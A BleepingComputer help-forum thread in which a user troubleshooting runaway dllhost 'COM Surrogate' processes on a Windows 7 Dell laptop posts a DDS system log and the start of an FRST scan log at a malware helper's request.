Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Many dllhost 'COM Surrogate' processes eating mem & proc


  • This topic is locked This topic is locked
24 replies to this topic

#1 scooter2028

scooter2028

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:05 AM

Posted 16 July 2014 - 08:37 AM

Thanks in advance for any help.

 

Many dllhost.exe ‘COM Surrogate’ processes are started and are eating up CPU and memory.  After awhile the system becomes unusable.

 

If I let it run, they will keep adding processes to at least 30 or maybe more.  I have always killed them before any more could be initiated.  When several are running, the system bogs down severely.

 

If I let the processes pile up for awhile, eventually a popup will appear saying that my settings do not allow my  download file to be downloaded.  didn't request a file.

 

After Googling, it seems that this is not an isolated problem but there doesn’t seem to be any one root cause. 

 

System Configuration:
Hardware:
   Dell Laptop ‘Studio XPS’ – XPS-1645
- 8 GB memory
- CPU: Intel Core i7 – Q 720 @ 1.60 GHz, 4 core, 8 logical processors

OS:
- MS Windows 7 Professional 64 bit, SP1
Network:
- Hardwired to LAN.

 

If the system is never connected to the network (boot without plugging in the Ethernet cable) and never plugging in the cable while the system is up, the ‘COM Surrogate’ processes never start. 

 

To run the DDS program, I let several of these processes start and then started DDS.  It ran to about 70% of the completion graph and wouldn't progress further.  A check of the task manager showed that it was getting time but very rarely.  I eventually killed the 'COM Surrogate's and DDS went about its business and finished in a reasonable time.

 

DDS.LOG

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17126
Run by Ric at 23:09:20 on 2014-07-15
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8180.5344 [GMT -4:00]
.
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\STacSV64.exe
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Windows\system32\BtwRSupportService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe
C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe
C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe
C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe
C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\svchost.exe -k bthsvcs
C:\Windows\system32\taskmgr.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Roy\totalcmd\TOTALCMD64.EXE
C:\Windows\syswow64\dllhost.exe
C:\Kits\processexplorer\procexp.exe
C:\Users\Ric\AppData\Local\Temp\procexp64.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
uWindow Title = Internet Explorer, enhanced for Bing and MSN
uSearch Page = hxxp://www.google.com
uDefault_Search_URL = hxxp://www.google.com/ie
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
mWinlogon: Userinit = c:\windows\syswow64\userinit.exe,
BHO: AutorunsDisabled - <orphaned>
BHO: ContributeBHO Class: {074C1DC5-9320-4A9A-947D-C042949C6216} - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll
BHO: MSS+ Identifier: {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} - C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll
BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Windows Live Messenger Companion Helper: {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - C:\Program Files (x86)\Windows Live\Companion\companioncore.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
TB: Contribute Toolbar: {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll
TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
EB: Canon Easy-WebPrint EX: {21347690-EC41-4F9A-8887-1F4AEE672439} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
dRunOnce: [{90140000-003D-0000-1000-0000000FF1CE}] C:\Windows\System32\cmd.exe /C del "C:\ProgramData\Microsoft Help\Rgstrtn.lck" /Q /A:H
StartupFolder: C:\Users\Ric\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Dropbox.lnk - C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - C:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~1\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
IE: {0000036B-C524-4050-81A0-243669A86B9F} - {B63DBA5F-523F-4B9C-A43D-65DF1977EAD3} - C:\Program Files (x86)\Windows Live\Companion\companioncore.dll
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
Trusted Zone: dell.com
DPF: {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} - hxxps://support.dell.com/systemprofiler/SysProExe.CAB
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_27-windows-i586.cab
DPF: {C1F8FC10-E5DB-4112-9DBF-6C3FF728D4E3} - hxxp://support.dell.com/systemprofiler/DellSystemLite.CAB
DPF: {CAFEEFAC-0016-0000-0027-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_27-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_27-windows-i586.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} - hxxps://akamaicdn.webex.com/client/WBXclient-T28L10NSP12_CP1-16851/webex/ieatgpc1.cab
DPF: {FFB3A759-98B1-446F-BDA9-909C6EB18CC7} - hxxp://utilities.pcpitstop.com/Optimize3/pcpitstop2.dll
TCP: NameServer = 192.168.0.1 205.171.3.26 205.171.2.26
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001} : DHCPNameServer = 192.168.0.1 205.171.3.26 205.171.2.26
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001}\14355535 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001}\349647275737F534162746 : DHCPNameServer = 192.168.2.1
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001}\3547F6E65634275656B6F52416C6C627F6F6D6 : DHCPNameServer = 192.168.1.6
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001}\960586F6E656 : DHCPNameServer = 172.20.10.1
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001}\C696E6B637973733530313 : DHCPNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{BCEEFB74-CBB0-43F6-BDE1-FB9F73661BA6} : DHCPNameServer = 198.224.180.135 198.224.179.135
TCP: Interfaces\{DE5F349B-1D1E-493C-8659-F280744843FB} : DHCPNameServer = 192.168.0.1 205.171.3.26 205.171.2.26
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: AutorunsDisabled - <orphaned>
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
x64-DPF: {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} - hxxps://support.dell.com/systemprofiler/SysProExe.CAB
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: AutorunsDisabled - <no file>
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2011-2-26 55856]
R0 Sahdad64;HDD Filter Driver;C:\Windows\System32\drivers\Sahdad64.sys [2012-7-6 27120]
R0 Saibad64;Volume Filter Driver;C:\Windows\System32\drivers\Saibad64.sys [2012-7-6 19952]
R1 SaibVdAd64;Virtual Disk Driver;C:\Windows\System32\drivers\SaibVdAd64.sys [2012-7-6 27632]
R2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269;Roxio SAIB Service;C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [2009-6-2 457200]
R2 AESTFilters;Andrea ST Filters Service;C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe [2014-6-16 89600]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2011-2-25 202752]
R2 BcmBtRSupport;Bluetooth Driver Management Service;C:\Windows\System32\BtwRSupportService.exe [2013-10-28 2255064]
R2 BOT4Service;BOT4Service;C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe [2010-7-14 32240]
R2 Fitbit Connect;Fitbit Connect Service;C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [2014-5-19 1436192]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2011-2-26 13336]
R2 PCPitstop Scheduling;PCPitstop Scheduling;C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe [2011-3-25 86016]
R2 QDLService2kDell;Qualcomm Gobi 2000 Download Service (Dell);C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [2010-1-14 330488]
R2 rimspci;rimspci;C:\Windows\System32\drivers\rimspe64.sys [2011-2-25 60416]
R2 risdpcie;risdpcie;C:\Windows\System32\drivers\risdpe64.sys [2011-2-25 80896]
R2 rixdpcie;rixdpcie;C:\Windows\System32\drivers\rixdpe64.sys [2011-2-25 55808]
R2 TurboB;Turbo Boost UI Monitor driver;C:\Windows\System32\drivers\TurboB.sys [2009-11-2 13784]
R2 WMCoreService;Mobile Broadband Service;C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode --> C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode [?]
R3 bcbtums;Bluetooth USB LD Filter;C:\Windows\System32\drivers\bcbtums.sys [2013-10-28 170712]
R3 btwampfl;btwampfl;C:\Windows\System32\drivers\btwampfl.sys [2013-10-2 166104]
R3 btwl2cap;Bluetooth L2CAP Service;C:\Windows\System32\drivers\btwl2cap.sys [2011-2-25 35104]
R3 CtClsFlt;Creative Camera Class Upper Filter Driver;C:\Windows\System32\drivers\CtClsFlt.sys [2011-2-26 172704]
R3 ITECIRfilter;ITECIR Filter Driver;C:\Windows\System32\drivers\ITECIRfilter.sys [2011-3-22 28264]
R3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;C:\Windows\System32\drivers\k57nd60a.sys [2009-6-10 270848]
R3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;C:\Windows\System32\drivers\netw5v64.sys [2009-6-10 5434368]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 RoxWatch12;Roxio Hard Drive Watcher 12;C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe [2010-7-16 354288]
S3 btusbflt;Bluetooth USB Filter;C:\Windows\System32\drivers\btusbflt.sys [2010-4-14 54824]
S3 BVRPMPR5a64;BVRPMPR5a64 NDIS Protocol Driver;C:\Windows\System32\drivers\BVRPMPR5a64.SYS [2011-11-20 35840]
S3 fssfltr;fssfltr;C:\Windows\System32\drivers\fssfltr.sys [2011-2-26 48488]
S3 fsssvc;Windows Live Family Safety Service;C:\Program Files (x86)\Windows Live\Family Safety\fsssvc.exe [2010-9-23 1493352]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-6-11 111616]
S3 McComponentHostService;McAfee Security Scan Component Host Service;C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [2014-4-9 289256]
S3 Netaapl;Apple Mobile Device Ethernet Service;C:\Windows\System32\drivers\netaapl64.sys [2011-5-10 22528]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-1-9 174440]
S3 qrkis;Tether Miniport;C:\Windows\System32\drivers\qrkis.sys [2011-2-26 50856]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2013-2-18 19456]
S3 RoxMediaDB13;RoxMediaDB13;C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [2010-7-16 1099248]
S3 StorSvc;Storage Service;C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 27136]
S3 SwitchBoard;Adobe SwitchBoard;C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-2-19 517096]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2014-4-9 56832]
S3 TurboBoost;TurboBoost;C:\Program Files\Intel\TurboBoost\TurboBoost.exe [2009-11-2 126352]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2011-2-25 1255736]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== File Associations ===============
.
ShellExec: dreamweaver.exe: Open="C:\Program Files (x86)\Adobe\Adobe Dreamweaver CS5\dreamweaver.exe", "%1"
.
=============== Created Last 30 ================
.
2014-07-14 16:08:07 -------- d-----w- C:\Windows\SysWow64\wbem\Performance
2014-07-14 15:20:30 -------- d-----w- C:\RegBackup
2014-07-14 13:20:32 -------- d-----w- C:\Program Files (x86)\Tweaking.com
2014-07-11 19:19:20 -------- d-----w- C:\Windows\ERUNT
2014-07-11 18:58:13 -------- d-----w- C:\Kits
2014-07-06 18:20:26 536576 ----a-w- C:\Windows\SysWow64\sqlite3.dll
2014-07-06 18:17:32 -------- d-----w- C:\AdwCleaner
2014-07-06 18:15:18 -------- d-----w- C:\Users\Ric\AppData\Local\GHISLER
2014-07-06 15:47:19 122584 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-07-06 15:46:49 91352 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-07-06 15:46:49 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-07-06 15:46:49 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-07-06 15:46:49 -------- d-----w- C:\ProgramData\Malwarebytes
2014-07-06 15:46:49 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-07-05 16:52:15 -------- d-----w- C:\Roy
2014-06-25 23:54:59 -------- d-----w- C:\Users\Ric\AppData\Roaming\Feeqvena
2014-06-25 23:50:51 -------- d-----w- C:\ProgramData\IculOnse
2014-06-18 13:49:30 -------- d-----w- C:\ProgramData\Package Cache
2014-06-18 13:48:35 -------- d-----w- C:\TDSSKiller_Quarantine
2014-06-18 13:47:02 -------- d-----w- C:\AMD
2014-06-16 13:54:24 -------- d-----w- C:\Users\Ric\AppData\Roaming\WMCore
2014-06-16 13:53:48 -------- d-----w- C:\Users\Ric\AppData\Roaming\WirelessManager
2014-06-16 13:38:37 -------- d-----w- C:\ProgramData\QUALCOMM
2014-06-16 13:38:37 -------- d-----w- C:\Program Files (x86)\QUALCOMM
2014-06-16 13:38:24 -------- d-----w- C:\Windows\Dell
2014-06-16 13:37:05 41280 ----a-w- C:\Windows\System32\drivers\PCASp50a64.sys
2014-06-16 13:36:38 -------- d-----w- C:\ProgramData\Novatel Wireless
2014-06-16 13:24:41 -------- d-----w- C:\Users\Ric\New folder
2014-06-16 13:24:30 -------- d-----w- C:\Users\Ric\Dell Downloads
2014-06-16 13:12:25 -------- d-----w- C:\Program Files\My Dell
2014-06-16 13:09:36 -------- d-----w- C:\temp
.
==================== Find3M  ====================
.
2014-06-13 13:38:17 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-06-13 13:38:17 699056 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-06-03 20:51:18 18960 ----a-w- C:\Windows\System32\drivers\LNonPnP.sys
2014-05-30 10:02:37 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2014-05-30 10:02:09 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2014-05-30 09:39:43 548352 ----a-w- C:\Windows\System32\vbscript.dll
2014-05-30 09:39:23 66048 ----a-w- C:\Windows\System32\iesetup.dll
2014-05-30 09:38:29 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2014-05-30 09:21:23 139264 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-05-30 09:21:05 111616 ----a-w- C:\Windows\System32\ieetwcollector.exe
2014-05-30 09:20:36 752640 ----a-w- C:\Windows\System32\jscript9diag.dll
2014-05-30 09:11:24 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-05-30 09:08:22 5782528 ----a-w- C:\Windows\System32\jscript9.dll
2014-05-30 09:02:39 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-05-30 08:55:36 38400 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-05-30 08:44:28 455168 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-05-30 08:43:06 61952 ----a-w- C:\Windows\SysWow64\iesetup.dll
2014-05-30 08:42:16 51200 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2014-05-30 08:28:33 112128 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-05-30 08:27:56 592896 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2014-05-30 08:24:19 1249280 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2014-05-30 08:23:22 2040832 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-05-30 08:10:46 32256 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-05-30 07:56:56 2266112 ----a-w- C:\Windows\System32\wininet.dll
2014-05-30 07:56:50 4244992 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-05-30 07:50:09 1068032 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2014-05-30 07:49:38 1964544 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-05-30 07:21:10 1790976 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-05-09 06:14:03 477184 ----a-w- C:\Windows\System32\aepdu.dll
2014-05-09 06:11:23 424448 ----a-w- C:\Windows\System32\aeinv.dll
2014-05-08 09:32:11 3178496 ----a-w- C:\Windows\System32\rdpcorets.dll
2014-05-08 09:32:11 16384 ----a-w- C:\Windows\System32\RdpGroupPolicyExtension.dll
2014-04-25 02:34:59 801280 ----a-w- C:\Windows\System32\usp10.dll
2014-04-25 02:06:17 626688 ----a-w- C:\Windows\SysWow64\usp10.dll
.
============= FINISH: 23:25:09.20 ===============

 

 

 

 

 

Attached Files



BC AdBot (Login to Remove)

 


m

#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:05 PM

Posted 16 July 2014 - 09:26 AM

Hi there,

please run a FRST scan:


Please download Farbar Recovery Scan Tool and save it to your Desktop.
  • Start FRST with administator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.


#3 scooter2028

scooter2028
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:05 AM

Posted 16 July 2014 - 10:25 AM

The FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 15-07-2014 01
Ran by Ric (administrator) on DELL-XPS-1645 on 16-07-2014 10:53:41
Running from C:\Users\Ric\Desktop
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\stacsv64.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Carbonite, Inc. (www.carbonite.com)) C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe
() C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe
(Cyberlink) C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(PC Pitstop LLC) C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe
(QUALCOMM, Inc.) C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe
(Dropbox, Inc.) C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe
